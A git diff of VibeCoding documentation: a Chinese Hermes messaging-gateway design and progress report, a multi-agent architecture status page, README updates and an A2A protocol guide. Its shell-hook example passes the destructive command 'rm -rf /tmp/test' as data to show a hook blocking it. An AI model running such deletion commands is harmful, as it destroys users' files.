+│   ├── progress.go              # ✅ ProgressBuffer 批量进度推送（新增，提案未列出）
+│   ├── progress_test.go         # ✅
+│   ├── wechat/                  # ✅ 微信 iLink 适配器（自行实现，零外部依赖）
+│   │   ├── wechat.go            # ✅ Bot 主体，实现 messaging.Platform
+│   │   ├── types.go             # ✅ iLink 协议类型定义
+│   │   ├── protocol.go          # ✅ iLink HTTP API 调用
+│   │   ├── auth.go              # ✅ QR 登录 + 凭证持久化
+│   │   └── crypto.go            # ✅ AES-128-ECB CDN 加解密
+│   └── feishu/                  # ✅ 飞书适配器
+│       └── feishu.go            # ✅ 飞书 SDK 封装（长连接），实现 messaging.Platform
+│                               #    ⚠️ session.go 未创建（per-user session 由 dispatcher 统一管理）
+│
+├── hermes/                      # Hermes 模式编排层
+│   ├── server.go                # ✅ 守护进程主循环（组装 gateway + messaging + cron）
+│   ├── config.go                # ✅ hermes.json 配置加载（全局 + 项目级合并）
+│   ├── config_test.go           # ✅
+│   ├── dispatcher.go            # ✅ 消息 → Agent 转发调度器
+│   ├── security.go              # ✅ 用户白名单 + 命令风险分类 + 自动审批（新增）
+│   ├── security_test.go         # ✅
+│   ├── webhook_handler.go       # ✅ Webhook → Agent 任务处理（新增）
+│   ├── webhook_handler_test.go  # ✅
+│   ├── ws/                      # ✅ WebSocket + HTTP 网关
+│   │   ├── server.go            # ✅ net/http 服务器（⚠️ 使用 golang.org/x/net/websocket 而非 gorilla/websocket）
+│   │   ├── handler.go           # ✅ WebSocket 消息处理
+│   │   └── api.go               # ✅ HTTP REST API
+│   ├── a2a/                     # ❌ A2A 协议 Server — 目录不存在，未实现
+│   ├── webhook/                 # ✅ Webhook 入站
+│   │   └── router.go            # ✅ HMAC-SHA256 验签 + 路由分发
+│   └── hooks/                   # ✅ Shell Hooks
+│       └── hooks.go             # ✅ 外部脚本调用（JSON stdin/stdout）
+│
+├── a2a/                         # 🔶 待实现 — A2A 协议（独立于 hermes 的顶层包）
+│   ├── server.go                # A2A HTTP server（独立模式 + 集成模式）
+│   ├── handler.go               # JSON-RPC 2.0 handler
+│   ├── agent_card.go            # Agent Card 生成
+│   ├── task.go                  # Task 生命周期管理
+│   ├── executor.go              # AgentExecutor（A2A Task → agent loop）
+│   ├── sse.go                   # SSE 流式响应
+│   └── config.go                # A2A 配置
+│
+├── memory/                      # 持久化记忆
+│   ├── store.go                 # ✅ memory.md 读写（全局/项目级查找逻辑）
+│   ├── store_test.go            # ✅
+│   └── tool.go                  # ✅ memory 工具定义
+│
+└── (existing packages unchanged)
+```
+
+> **与提案的偏差**：
+> 1. `feishu/session.go` 未创建 — per-user session 由 `dispatcher.go` 统一管理，不需要单独的 feishu session 文件
+> 2. `ws/server.go` 使用 `golang.org/x/net/websocket` 而非提案中的 `gorilla/websocket`
+> 3. 新增了提案未列出的文件：`messaging/progress.go`、`hermes/security.go`、`hermes/webhook_handler.go`
+> 4. A2A 从 `internal/hermes/a2a/` 移至 `internal/a2a/`（独立顶层包）
+
+> **架构要点**：
+> - `hermes/ws/` 是新增的 **WebSocket + HTTP 网关层**，Hermes 启动后始终运行，是所有客户端（`hermes client`、第三方应用）的接入点。
+> - Webhook 和 A2A 复用同一个 HTTP 端口（`server.port`），通过路由区分：`/ws`、`/a2a`、`/webhook/*`、`/api/*`。
+> - `internal/messaging/` 是消息平台的**抽象 + 实现**层，纯粹关注"接收消息、发送消息"。每个子包是独立适配器，实现 `messaging.Platform` 接口。
+> - `internal/hermes/` 是 Hermes 模式的**编排层**，负责把 gateway、messaging、webhook、cron、agent loop 组装到一起运行。
+> - 新增平台只需在 `messaging/` 下加子包，无需改动编排层。
+
+### 9.2 消息平台抽象
+
+> ✅ **已实现** — `internal/messaging/platform.go` 完整实现了以下接口。额外增加了 `IsConnected()` 方法和 `ProgressFunc` 字段。
+
+```go
+// internal/messaging/platform.go
+package messaging
+
+type Platform interface {
+    Name() string
+    Start(ctx context.Context, handler MessageHandler) error
+    Stop() error
+    SendMessage(ctx context.Context, chatID string, text string) error
+    IsConnected() bool  // 新增：提案中未列出
+}
+
+type MessageHandler func(ctx context.Context, msg InboundMessage) (string, error)
+
+type InboundMessage struct {
+    Platform  string
+    ChatID    string
+    UserID    string
+    UserName  string
+    Text      string
+    Timestamp time.Time
+    ProgressFunc func(text string)  // 新增：提案中未列出，用于进度推送
+}
+```
+
+### 9.3 hermes.json 配置加载（复用已有模式）
+
+```go
+// internal/hermes/config.go — 遵循 gateway.json 相同模式
+
+func HermesConfigPath() string {
+    return filepath.Join(config.ConfigDir(), "hermes.json")  // <GLOBAL_DIR>/hermes.json
+}
+
+func ProjectHermesConfigPath() string {
+    return filepath.Join(".vibe", "hermes.json")  // .vibe/hermes.json
+}
+
+func LoadHermesConfig() (*HermesConfig, error) {
+    cfg, err := loadHermesConfigFrom(HermesConfigPath())    // 1. 加载全局
+    if err != nil { return nil, err }
+    // 2. 项目级覆盖
+    if data, err := os.ReadFile(ProjectHermesConfigPath()); err == nil {
+        if err := json.Unmarshal(data, cfg); err != nil {
+            return nil, fmt.Errorf("parse project hermes config: %w", err)
+        }
+    }
+    return cfg, nil
+}
+```
+
+### 9.4 复用关系
+
+```
+hermes server (internal/hermes/)
+  │
+  ├─ 完全复用 ──────────────────────────────
+  │   ├── agent.Agent          (agent loop)
+  │   ├── provider.*           (OpenAI/Anthropic)
+  │   ├── tools.Registry       (所有内置工具)
+  │   ├── session.Store        (JSONL 持久化)
+  │   ├── sandbox              (bwrap)
+  │   ├── skills               (SKILL.md)
+  │   ├── context compaction   (压缩)
+  │   ├── context files        (AGENTS.md)
+  │   └── config.ConfigDir()   (全局配置目录解析)
+  │
+  ├─ 新增 ──────────────────────────────────
+  │   ├── hermes/ws            (WebSocket + HTTP 网关，始终启动)
+  │   ├── memory tool          (memory.md 按需读写，不注入 system prompt)
+  │   ├── messaging.Platform   (WeChat iLink / Feishu，可选连接)
+  │   ├── a2a                  (A2A Server — 独立顶层包，Agent 间协作)
+  │   ├── hermes/webhook       (入站 webhook)
+  │   ├── hermes.Hooks         (shell hooks)
+  │   ├── context pressure     (compaction 层注入) 🔶 待实现
+  │   └── smart approvals      (tools 层拦截) 🔶 待讨论
+  │
+  └─ 增强 ──────────────────────────────────
+      └── cron                 (管理 CLI 补齐)
+```
+
+### 9.5 Shell Hooks 协议
+
+外部脚本通过 JSON stdin/stdout 通信：
+
+**pre_tool_call — stdin:**
+```json
+{
+  "hook": "pre_tool_call",
+  "tool": "bash",
+  "args": {"command": "rm -rf /tmp/test"},
+  "platform": "wechat",
+  "user_id": "wxid_12345"
+}
+```
+
+**stdout:**
+```json
+{"action": "allow"}
+```
+或
+```json
+{"action": "block", "reason": "destructive command blocked"}
+```
+
+---
+
+## 10. 实施阶段
+
+### Phase 1: 骨架 & 配置 & 网关
+
+- [x] `internal/messaging/platform.go` — Platform 接口定义（含 ProgressFunc）
+- [x] `internal/hermes/` 编排层骨架
+- [x] `internal/hermes/config.go` — hermes.json 配置加载（含 `server` 节、平台 `work_dir`、全局/项目级合并）
+- [x] `internal/hermes/ws/` — WebSocket + HTTP 网关骨架（server.go + handler.go + api.go）
+- [x] `vibecoding hermes` 子命令注册（start/stop/status/config/client/wechat/feishu/cron）
+- [x] Hermes server 主循环框架（启动网关 → 可选连接消息平台）
+- [x] `hermes/dispatcher.go` — per-user session 路由（`<sessionDir>/hermes/<platform>/<user_id>/active.jsonl`）
+- [x] session 归档逻辑（`/new` → `active.jsonl` 重命名 + 新建）
+- [x] CLI 标志: `-p`/`--provider`、`-m`/`--model`、`--multi-agent`、`--sandbox`
+- [x] hermes.json 新增字段: `default_provider`、`default_model`、`multi_agent`、`sandbox`
+- [x] MCP 服务器加载（继承全局/项目 mcp.json 配置）
+- [x] 消息平台进度事件推送（ProgressFunc: 工具执行 + 思考过程逐行发送）
+
+> **偏差**：
+> - WebSocket 使用 `golang.org/x/net/websocket` 而非 `gorilla/websocket`
+> - WebSocket 消息处理是同步模式（等 agent 完成后一次性返回），非真正的逐事件流式
+> - `stop`/`status`/`client` 命令是 stub，未实现
+
+### Phase 2: memory 工具 & 压力系统
+
+- [x] `internal/memory/store.go` — memory.md 读写（含 `.vibe/memory.md` → `<GLOBAL_DIR>/memory.md` 查找逻辑）
+- [x] `internal/memory/tool.go` — memory 工具（read/add/update/delete）
+- [x] System prompt guidelines 添加静态 memory 提示
+- [x] memory.md 默认写入项目目录（只有显式配置 `memory.path` 才写全局）
+- [x] Budget Pressure — MaxIterations 从 hermes config `agent.max_turns` 注入
+- [ ] Context Pressure — compaction 阈值警告
+
+> **偏差**：
+> - Budget Pressure 仅注入了 MaxIterations 上限，**未在 tool result 中注入迭代预算警告**（提案要求「在 tool result 中注入迭代预算警告」）
+> - Context Pressure 完全未实现（仅有配置字段）
+
+### Phase 3: 安全层
+
+- [x] Smart Approvals — 命令危险性分类（默认 yolo 模式）
+- [x] Shell Hooks — pre/post tool call 外部脚本（已接入 AfterToolCall）
+- [x] 用户白名单验证
+
+> **偏差**：Smart Approvals 的 WebSocket `approval_request` 交互流未实现（handler.go 中 approval case 标注 TODO）
+
+### Phase 4: 微信网关
+
+- [x] `internal/messaging/wechat/types.go` — iLink 协议类型定义
+- [x] `internal/messaging/wechat/protocol.go` — iLink HTTP API 调用
+- [x] `internal/messaging/wechat/auth.go` — QR 登录 + 凭证持久化到 `<GLOBAL_DIR>/wechat-credentials.json`
+- [x] `internal/messaging/wechat/crypto.go` — AES-128-ECB CDN 加解密
+- [x] `internal/messaging/wechat/wechat.go` — 实现 `messaging.Platform`
+- [x] `internal/hermes/dispatcher.go` — 消息 → Agent 转发
+- [x] `vibecoding hermes wechat login` — QR 码登录
+- [x] 消息平台命令（/new /clear /mode /status /sessions）
+
+> **无偏差** — 微信网关完整实现了提案中所有功能点。
+
+### Phase 5: 飞书网关
+
+- [x] `go get github.com/larksuite/oapi-sdk-go/v3`
+- [x] `internal/messaging/feishu/feishu.go` — 实现 `messaging.Platform`（长连接）
+- [x] `vibecoding hermes feishu setup` — 交互式配置
+- [x] `vibecoding hermes feishu status` — 连接状态
+
+> **偏差**：
+> - 提案中的 `feishu/session.go`（per-user Session 管理）**未创建** — session 由 `dispatcher.go` 统一管理
+> - `feishu setup` 仅打印配置说明文本，非真正的交互式配置向导
+
+### Phase 6: A2A Server + Webhook + Cron
+
+- [x] `internal/a2a/config.go` — A2A 配置
+- [x] `internal/a2a/task.go` — Task 生命周期管理（submitted → working → completed/failed/canceled）
+- [x] `internal/a2a/handler.go` — JSON-RPC 2.0 handler（message/send, task/get, task/cancel）+ SSE 流式
+- [x] `internal/a2a/agent_card.go` — Agent Card 生成 (/.well-known/agent.json)
+- [x] `internal/a2a/executor.go` — DefaultExecutor（A2A Task → agent loop）
+- [x] `internal/a2a/server.go` — A2A HTTP server（独立模式 + 集成模式）
+- [x] `cmd/vibecoding/main_a2a.go` — `vibecoding a2a` 子命令（start/stop/status/card）
+- [x] hermes 集成：`a2a.enabled: true` 时将 A2A 端点挂载到 hermes HTTP mux
+- [x] `internal/hermes/webhook/` — HTTP 入站 webhook 路由
+- [x] Webhook 路由 → Agent 任务（webhook_handler.go）
+- [x] Cron 管理 CLI 命令（list/add/remove/enable/disable）
+
+> **A2A 已完成**：零外部依赖，直接实现 JSON-RPC 2.0 over HTTP + SSE 流式。
+> **Cron 已确认**：CLI 命令范围已确定（不做 edit/run），底层 cron 实现与项目共享，有 bug 或缺陷仍需修复完善。
+
+### Phase 7: WebSocket 流式推送 & 补全 CLI
+
+- [x] WebSocket 流式推送：`wsDispatcherAdapter` 改为监听 `chan agent.Event`，逐事件转换为 `WSEvent` 发送
+- [x] `hermes stop` — PID 文件 + SIGTERM 信号
+- [x] `hermes status` — PID 检查 + HTTP health 查询
+- [x] `hermes client` — WebSocket 客户端（流式输出 + 斜杠命令 + session 恢复）
+- [x] `hermes webhook list` — webhook 路由查看
+- [x] `hermes memory show/clear` — memory 查看和清空
+- [x] `hermes sessions list` — 查询运行实例的活跃 session
+- [x] `/api/memory` HTTP — 集成 MemoryStore 实现 GET/PUT
+
+### Phase 8: Context Pressure & 压力系统
+
+- [x] Context Pressure — `EventContextPressure` 事件，55% 阈值触发一次，上层决策处理
+- [x] Budget Pressure — `EventBudgetPressure` 事件，剩余 20% 时触发一次
+- [x] hermes.json 配置：`agent.context_pressure_threshold`（默认 0.55）、`agent.budget_pressure_threshold`（默认 0.20）
+- [x] hermes dispatcher 事件转发到消息平台 ProgressFunc
+- [ ] WebSocket 流式推送压力事件（依赖 Phase 7 流式改造）
+
+> **设计决策**：
+> - Context Pressure 使用 Event 通知模式（方案 C），由上层决定如何处理
+> - Budget Pressure 在剩余 20% 时一次性注入（方案 B），不重复打扰
+> - 阈值可配置，默认 Context 55%、Budget 剩余 20%
+
+### Phase 9: Smart Approvals
+
+- [x] 方案 D 分级策略实现
+  - low risk → 自动批准
+  - medium risk → 自动批准 + 通知用户
+  - high risk (WebSocket) → 发送 `approval_request`，等待用户 `approval_response`（5 分钟超时）
+  - high risk (消息平台) → 自动拒绝 + 通知用户
+- [x] `security.go` — `FormatApprovalNotification()` 通知格式化
+- [x] `dispatcher.go` — `RegisterApproval()` / `ResolveApproval()` 审批状态管理
+- [x] `ws/handler.go` — `approval` 消息处理 → `ResolveApproval()`
+- [x] `server.go` — `agentEventToWSEvent` 转换 `EventToolApprovalRequest`
+
+> **设计决策**：
+> - 消息平台不支持交互式审批（无法暂停 agent loop 等待用户回复），高风险命令自动拒绝
+> - WebSocket 支持完整审批流：`approval_request` → 用户回复 → `approval_response`
+> - 审批超时 5 分钟，超时自动拒绝
+
+### Phase 10: 文档 & 测试
+
+- [x] hermes 子命令使用文档 (`docs/en/hermes.md`, `docs/zh/hermes.md`)
+- [x] hermes.json 配置文档（含全局/项目级层级说明）
+- [x] 微信 iLink / 飞书 Bot 设置指南
+- [x] A2A Server 接入文档 (`docs/en/a2a.md`, `docs/zh/a2a.md`)
+- [x] `vibecoding a2a` 子命令文档
+- [x] 单元测试（schedule, progress buffer, security, config, cron tool, webhook handler）
+- [x] Changelog 更新 (`docs/en/changelog.md`, `docs/zh/changelog.md`)
+- [ ] 集成测试
+
+---
+
+## 11. 与现有模式的关系
+
+| 维度 | CLI (TUI) | ACP | Gateway | **Hermes (新增)** | **A2A (新增)** |
+|------|-----------|-----|---------|-------------------|----------------|
+| **入口** | 终端 stdin | Editor stdio | HTTP API | **WebSocket + HTTP 网关** + 消息平台 (微信/飞书) | **JSON-RPC 2.0 over HTTP** |
+| **使用者** | 开发者本人 | 编辑器 | 其他应用 | **终端用户 (Bot) / 开发者 (`client`)** | **其他 Agent** |
+| **Session** | 本地管理 | 编辑器管理 | 客户端指定 | **服务端管理 (per-user，`client` 可跨终端恢复)** | **Task 生命周期** |
+| **认证** | 无 | 无 | Bearer token | **平台用户白名单** | **Bearer token** |
+| **常驻** | 否 | 否 | 是 | **是（`client` 按需连接）** | **是** |
+| **Cron** | 无 | 无 | 无 | **内置调度器** | 无 |
+| **记忆** | 无 | 无 | 无 | **memory.md (tool 按需读写)** | 无 |
+| **配置** | `settings.json` | `settings.json` | `gateway.json` | **`hermes.json`** | **`a2a.json` 或 hermes.json 中 a2a 节** |
+| **配置层级** | `<GLOBAL_DIR>` + `.vibe/` | `<GLOBAL_DIR>` + `.vibe/` | `<GLOBAL_DIR>` + `.vibe/` | **`<GLOBAL_DIR>` + `.vibe/`** | **`<GLOBAL_DIR>` + `.vibe/`** |
+| **A2A** | 无 | 无 | 无 | **集成模式（配置启用）** | **独立模式 + 集成模式** |
+
+---
+
+## 12. 供应链安全原则
+
+| 组件 | 策略 | 说明 |
+|------|------|------|
+| 微信 iLink | **自行实现** | 参考 iLink 协议规范实现为 internal 包，零外部依赖 |
+| 飞书 SDK | **官方 SDK** | `larksuite/oapi-sdk-go` 飞书官方维护，可接受 |
+| A2A SDK | **官方 SDK** | `a2aproject/a2a-go` Google/Linux Foundation 维护，可接受 |
+| CDN 加密 | **标准库** | `crypto/aes` Go 标准库，无外部依赖 |
+| HTTP 调用 | **标准库** | `net/http` Go 标准库 |
+
+> **原则**：能用标准库实现的不引入外部包；必须引入的只用官方/基金会维护的 SDK。
+
+---
+
+## 13. 非目标
+
+1. **Web 搜索** — 用户通过第三方 skill 扩展
+2. **Checkpoints / Rollback** — 推迟
+3. **企业微信** — 用个人微信 iLink 代替
+4. **Memory 注入 system prompt** — 破坏缓存命中，改用 tool 按需读写
+5. **Telegram / Discord** — v0.1.28
+6. **Python 插件 / RL Training / Voice** — 不做
+
+---
+
+*决策已确认。可以开始开发。*
diff --git a/docs/proposal/multi-agent-architecture-plan.md b/docs/proposal/multi-agent-architecture-plan.md
new file mode 100644
index 0000000..6c433cb
--- /dev/null
+++ b/docs/proposal/multi-agent-architecture-plan.md
@@ -0,0 +1,147 @@
+# Multi-Agent Architecture Status
+
+This document records the implemented multi-agent architecture as of `v0.1.25`.
+It replaces the original implementation checklist, which has been retired now
+that the core work has landed.
+
+## Decisions
+
+| # | Decision | Status |
+|---|----------|--------|
+| 1 | Public Agent interface | Implemented in `agent/` |
+| 2 | Per-agent Registry isolation | Implemented |
+| 3 | Async sub-agent handle workflow | Implemented |
+| 4 | Phased implementation | Completed through multi-agent, cron foundation, and provider adapter work |
+| 5 | No nested sub-agents | Enforced by policy and registry filtering |
+| 6 | Isolated sub-agent context | Implemented with independent messages, context, and session |
+| 7 | Frozen prompt and dual-marker cache strategy | Reused by child agents |
+| 8 | Multi-agent mode opt-in | Implemented with `--multi-agent` |
+| 9 | Cron depends on multi-agent workflows | Foundation implemented; TUI command entry points are wired |
+| 10 | Public package for external Agent usage | Implemented in `agent/` |
+| 11 | Builder-based Agent creation | Implemented |
+| 12 | Provider adapter architecture | Implemented with vendor adapters plus generic protocol providers |
+| 13 | Provider selection fallback | Implemented: explicit vendor, base URL detection, generic fallback |
+| 14 | Vendor differences via compat flags | Implemented for the currently supported OpenAI/Anthropic-compatible paths |
+
+## Implemented Components
+
+### Public Agent API
+
+- `agent.Agent`, `agent.AgentID`, public event/message/context/provider types
+- `agent.Builder` with provider, model, mode, workdir, thinking, tools, sandbox, session, compaction, and approval options
+- Internal adapter bridge between public `agent` package and `internal/agent`
+
+### Agent Runtime
+
+- Agent IDs and parent IDs
+- Agent event routing with AgentID metadata
+- `AgentFactory` for centralized agent creation
+- Per-agent `tools.Registry`
+- Per-registry `JobManager`
+- Sub-agent prompt context
+- Sub-agent policy validation
+
+### Multi-Agent Management
+
+- `AgentManager` lifecycle management
+- `EventRouter`
+- `subagent_spawn`
+- `subagent_status`
+- `subagent_send`
+- `subagent_destroy`
+- Parent-to-child approval forwarding
+- Registry filtering so sub-agents cannot spawn nested sub-agents
+
+### CLI / TUI / ACP Integration
+
+- `--multi-agent` flag in CLI and ACP
+- Multi-agent manager wiring in CLI/TUI/ACP paths
+- ACP session runtime support for agent manager/factory usage
+- TUI command and event handling for multi-agent workflows
+
+### Cron
+
+- `internal/cron` package
+- File-backed cron store
+- Scheduler
+- `/cron` command entry points in TUI multi-agent mode
+- Tests for persistence and scheduling behavior
+
+### Provider Adapter Layer
+
+- Shared provider factory in `internal/provider/factory`
+- Vendor adapter registry in `internal/provider/vendor.go`
+- Per-vendor adapter files in `internal/provider/vendor_*.go`
+- Generic fallback to OpenAI-compatible or Anthropic-compatible providers
+- Compat handling for:
+  - `thinkingFormat`
+  - `supportsReasoningEffort`
+  - `maxTokensField`
+  - `forceAdaptiveThinking`
+  - DeepSeek/Xiaomi assistant `reasoning_content`
+
+## Provider Adapter Notes
+
+Most vendors are protocol-compatible with OpenAI Chat Completions or Anthropic
+Messages. Vendor adapter files should apply defaults and compatibility behavior,
+while the protocol providers continue to handle request/stream mechanics.
+
+Current vendor detection includes:
+
+- `anthropic`
+- `claude`
+- `openai`
+- `deepseek`
+- `xiaomi`
+- `xiaomi-token-plan-ams`
+- `xiaomi-token-plan-cn`
+- `xiaomi-token-plan-sgp`
+- `kimi`
+- `minimax`
+- `seed`
+- `qianfan`
+- `bailian`
+- `gitee`
+- `openrouter`
+- `together`
+- `groq`
+- `fireworks`
+
+Adding a vendor should usually mean:
+
+1. Add `internal/provider/vendor_<name>.go`.
+2. Register base URL detection and defaults through `RegisterVendorAdapter`.
+3. Add compat flags to model config only when a specific model needs protocol tweaks.
+4. Keep the existing settings JSON schema stable.
+5. Add targeted tests in `internal/provider` or the relevant protocol provider package.
+
+## Acceptance Status
+
+The `v0.1.25` release scope is accepted when:
+
+- [x] Public Agent interface and Builder compile and are covered by tests
+- [x] Agent IDs and parent IDs are present on agents and events
+- [x] Each agent has isolated registry/job-manager state
+- [x] AgentFactory is used for centralized agent creation
+- [x] AgentManager supports create/get/destroy/list and parent-child relations
+- [x] EventRouter dispatches by AgentID
+- [x] Sub-agent tools work and are covered by tests
+- [x] Sub-agent nesting is blocked
+- [x] Multi-agent mode is opt-in through `--multi-agent`
+- [x] Cron store and scheduler are covered by tests
+- [x] TUI exposes `/cron` command entry points in multi-agent mode
+- [x] Provider vendor adapter layer supports explicit vendor, base URL detection, and generic fallback
+- [x] Existing provider config format remains compatible
+- [x] OpenAI/Anthropic provider compat behavior is covered by tests
+- [x] `make test` passes
+
+## Known Follow-Ups
+
+- Additional native provider protocols such as Google Gemini or Mistral can be
+  added later as separate provider implementations.
+- More compatibility flags from `/home/free/src/pi/packages/ai` can be wired as
+  concrete behavior when a supported model or vendor requires them.
+- Full natural-language cron parsing and persistent TUI cron management still
+  need product wiring on top of the `internal/cron` foundation.
+- Release packaging still needs to be rebuilt from a clean release tag for each
+  published version.
diff --git a/docs/zh/README.md b/docs/zh/README.md
index 576398b..6a7269f 100644
--- a/docs/zh/README.md
+++ b/docs/zh/README.md
@@ -9,9 +9,16 @@
 </p>
 
 <p align="center">
-  <a href="https://github.com/startvibecoding/vibecoding"><img src="https://img.shields.io/github/v/release/startvibecoding/vibecoding" alt="GitHub Release"></a>
-  <a href="https://github.com/startvibecoding/vibecoding/blob/main/LICENSE"><img src="https://img.shields.io/github/license/startvibecoding/vibecoding" alt="License"></a>
-  <a href="https://github.com/startvibecoding/vibecoding"><img src="https://img.shields.io/github/stars/startvibecoding/vibecoding?style=social" alt="GitHub Stars"></a>
+  主打渐进式、敏捷开发体验的 VibeCoding 工具，整体打包为单个文件，开箱即用，无需重复搭建部署 Claude Code 、 codex、Claw、Hermes 环境。
+</p>
+
+<p align="center">
+  <a href="https://www.npmjs.com/package/vibecoding-installer"><img src="https://img.shields.io/npm/dm/vibecoding-installer.svg" alt="npm downloads"></a>
+  <a href="https://github.com/startvibecoding/vibecoding/releases/latest"><img src="https://img.shields.io/github/release/startvibecoding/vibecoding.svg" alt="GitHub release"></a>
+  <a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-blue.svg" alt="License: MIT"></a>
+  <a href="https://goreportcard.com/report/github.com/startvibecoding/vibecoding"><img src="https://goreportcard.com/badge/github.com/startvibecoding/vibecoding" alt="Go Report Card"></a>
+  <a href="https://pkg.go.dev/github.com/startvibecoding/vibecoding"><img src="https://pkg.go.dev/badge/github.com/startvibecoding/vibecoding?status.svg" alt="GoDoc"></a>
+  <a href="https://github.com/startvibecoding/vibecoding/network/dependencies"><img src="https://img.shields.io/librariesio/release/github/startvibecoding/vibecoding" alt="Dependencies"></a>
 </p>
 
 ---
@@ -20,12 +27,13 @@
 
 ## 什么是 VibeCoding?
 
-VibeCoding 是一个基于终端的 AI 编码助手，帮助你编写、调试、重构和理解代码。它支持多种 LLM 提供商，包括 DeepSeek（默认）、OpenAI、Anthropic 以及任何 OpenAI/Anthropic 兼容的 API。
+VibeCoding 是一个基于终端的 AI 编码助手，帮助你编写、调试、重构和理解代码。它支持多种 LLM 提供商，包括 DeepSeek（默认）、OpenAI、Anthropic，以及通过厂商适配器接入的 OpenAI/Anthropic 兼容 API。
 
 ### 核心特性
 
-- 🤖 **多提供商支持** — DeepSeek、OpenAI、Anthropic 及自定义提供商
-- 🔧 **7 个内置工具** — 文件操作、代码搜索、命令执行
+- 🤖 **多提供商支持** — DeepSeek、OpenAI、Anthropic、厂商适配器及自定义提供商
+- 🔧 **内置工具** — 文件操作、代码搜索、命令执行、任务计划和可选子 Agent 工具
+- 🧭 **多 Agent 工作流** — `--multi-agent` 模式支持委托子 Agent 和 cron 命令入口
 - 🛡️ **沙箱安全** — 通过 bubblewrap 实现进程级隔离
 - 📝 **会话管理** — 持久化对话历史，支持分支
 - 🎯 **3 种操作模式** — Plan（只读）、Agent（标准）、YOLO（完全访问）
@@ -51,7 +59,9 @@ VibeCoding 是一个基于终端的 AI 编码助手，帮助你编写、调试
 - [系统架构](architecture.md) — 项目结构、核心组件、数据流
 - [工具系统](tools.md) — 内置工具使用指南
 - [技能系统](skills.md) — 可复用提示片段
+- [在线Skill市场集成](skillhub.md) — 兼容 SkillHub / ClawHub，技能安装与 Cron 基础设施
 - [会话管理](sessions.md) — 会话存储和管理
+- [SDK 集成指南](sdk.md) — 将 VibeCoding Agent 嵌入你的 Go 应用
 
 ### 安全
 - [安全与沙箱](security.md) — 沙箱模式、权限控制、审批机制
@@ -59,6 +69,14 @@ VibeCoding 是一个基于终端的 AI 编码助手，帮助你编写、调试
 ### IDE 集成
 - [ACP 协议](acp.md) — Agent Client Protocol 支持 VS Code 和 JetBrains
 
+### 网关模式
+- [Gateway 模式](gateway.md) — OpenAI 兼容 HTTP 网关
+- [Hermes 模式](hermes.md) — 消息平台网关 (微信/飞书/WebSocket)
+- [A2A 协议](a2a.md) — Agent-to-Agent 协议服务器与 Master 模式
+
+### 场景演示
+- [场景演示](scenarios.md) — 各种模式的实际用法和工作流
+
 ### 开发
 - [开发指南](development.md) — 贡献代码、测试、构建
 
@@ -72,11 +90,14 @@ VibeCoding 是一个基于终端的 AI 编码助手，帮助你编写、调试
 |------|------|
 | [快速入门](getting-started.md) | 5 分钟上手 VibeCoding |
 | [配置文件](configuration.md) | 自定义提供商、模型和行为 |
-| [工具参考](tools.md) | 了解所有 7 个内置工具 |
+| [工具参考](tools.md) | 了解内置工具和可选多 Agent 工具 |
 | [安全模型](security.md) | 理解沙箱、模式和权限 |
 | [ACP 协议](acp.md) | 通过 Agent Client Protocol 集成 IDE |
 | [会话管理](sessions.md) | 对话历史和分支 |
 | [技能系统](skills.md) | 创建可复用提示片段 |
+| [在线Skill市场集成](skillhub.md) | 兼容 SkillHub / ClawHub，技能安装与 Cron 基础设施 |
+| [SDK 集成指南](sdk.md) | 将 VibeCoding Agent 嵌入你的 Go 应用 |
+| [场景演示](scenarios.md) | 各种模式的实际用法和工作流 |
 | [更新日志](changelog.md) | 查看每个版本的新内容 |
 
 ## 支持的 LLM
@@ -86,7 +107,8 @@ VibeCoding 是一个基于终端的 AI 编码助手，帮助你编写、调试
 | **DeepSeek**（默认） | deepseek-v4-flash, deepseek-v4-pro | OpenAI Chat / Anthropic Messages |
 | **OpenAI** | GPT-4o, o1 等 | OpenAI Chat |
 | **Anthropic** | Claude Sonnet, Opus 等 | Anthropic Messages |
-| **自定义** | 任何兼容模型 | OpenAI Chat 或 Anthropic Messages |
+| **厂商适配器** | Google Gemini、Google Vertex、小米、Kimi、MiniMax、Seed、Qianfan、Bailian、Gitee、OpenRouter、Together、Groq、Fireworks 等 | OpenAI Chat 或 Anthropic Messages |
+| **自定义** | 任何兼容模型 | 通用 OpenAI Chat 或 Anthropic Messages fallback |
 
 ## 快速安装
 
diff --git a/docs/zh/a2a.md b/docs/zh/a2a.md
new file mode 100644
index 0000000..887288a
--- /dev/null
+++ b/docs/zh/a2a.md
@@ -0,0 +1,372 @@
+# A2A 协议（Agent-to-Agent）
+
+## 概述
+
+A2A（Agent-to-Agent）协议使不同的 AI Agent 能够互相发现、通信和协作。VibeCoding 实现了 A2A 协议，支持**独立服务器**和 **Hermes 集成模式**两种运行方式。
+
+## 快速开始
+
+```bash
+# 独立模式
+vibecoding a2a start
+
+# 查看状态
+vibecoding a2a status
+
+# 查看 Agent Card
+vibecoding a2a card
+
+# 向其他 A2A 服务器发送任务
+vibecoding a2a send "列出所有 Go 文件" --target http://remote:8093
+
+# 发现远程 Agent Card
+vibecoding a2a discover http://remote:8093
+
+# 停止
+vibecoding a2a stop
+```
+
+## 运行模式
+
+### 独立模式
+
+在单独的端口运行专用的 A2A HTTP 服务器（默认：`127.0.0.1:8093`）。
+
+```bash
+vibecoding a2a start --port 8093 --work-dir /path/to/project
+```
+
+只有在明确需要对外暴露 A2A 服务时才使用 `--host 0.0.0.0`，并为对外部署配置 auth token。
+
+### 集成模式
+
+当 `hermes.json` 中 `a2a.enabled: true` 时，A2A 端点挂载到 Hermes 网关上。
+
+```jsonc
+{
+  "a2a": {
+    "enabled": true,
+    "port": 8093  // 集成模式下忽略（使用 hermes 端口）
+  }
+}
+```
+
+端点地址：
+- `http://localhost:8090/.well-known/agent.json`
+- `http://localhost:8090/a2a`
+- `http://localhost:8090/a2a/events`
+
+## 协议细节
+
+- **传输**：JSON-RPC 2.0 over HTTP
+- **流式**：SSE（Server-Sent Events）实时推送
+- **Task 生命周期**：`submitted` → `working` → `completed`/`failed`/`canceled`
+
+## Agent Card
+
+Agent Card 描述 Agent 的能力，在 `/.well-known/agent.json` 提供。
+
+```json
+{
+  "name": "VibeCoding",
+  "description": "AI coding assistant with file editing, terminal, and search capabilities",
+  "url": "http://localhost:8093/a2a",
+  "version": "0.1.31",
+  "capabilities": {
+    "streaming": true,
+    "pushNotifications": false
+  },
+  "skills": [
+    {
+      "id": "code-edit",
+      "name": "Code Editing",
+      "description": "Read, write, and edit code files with precise text replacement"
+    },
+    {
+      "id": "terminal",
+      "name": "Terminal Execution",
+      "description": "Execute shell commands, run tests, build projects"
+    },
